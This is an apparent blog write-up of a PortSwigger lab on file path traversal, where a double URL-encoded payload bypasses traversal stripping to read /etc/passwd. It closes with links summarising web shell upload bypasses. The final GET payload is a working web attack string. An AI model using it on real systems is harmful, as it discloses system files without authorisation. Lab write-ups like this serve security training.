On this page
apsyleg1 min read
#portswigger #path-traversal #web-security
File Path Traversal: Bypassing Traversal Stripping with Double URL-Encoding
Lab
File path traversal, traversal sequences stripped with superfluous URL-decode · Practitioner
Solution
Given
This lab contains a path traversal vulnerability in the display of product images.
The application blocks input containing path traversal sequences. It then performs a URL-decode of the input before using it.
To solve the lab, retrieve the contents of the /etc/passwd file.
Analysis and recon
Same as the previous lab, except this time we have to use URL-encoding and try replacing ../ with %2e%2e%2f. Or even double encoding: ../ → %2e%2e%2f → %252e%252e%252f.
We try the payload with %2e%2e%2f — didn't work.
Then double encoding — worked.
Final payload
GET /image?filename=%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd
More in this category
Web Shell Upload via Extension Blacklist Bypass (PortSwigger Lab)
.php is blacklisted, but .htaccess uploads without complaint — we slip our own Apache config in and make the server execute shell.bug as PHP.
Web Shell Upload via Obfuscated File Extension (PortSwigger Lab)
Extension blacklist rejects .php and a double-extension shell.php.jpg is served as an image — a null byte in shell.php%00.jpg bypasses both checks.
Remote Code Execution via Web Shell Upload (PortSwigger Lab)
Avatar upload has no validation — drop a PHP web shell and read /home/carlos/secret.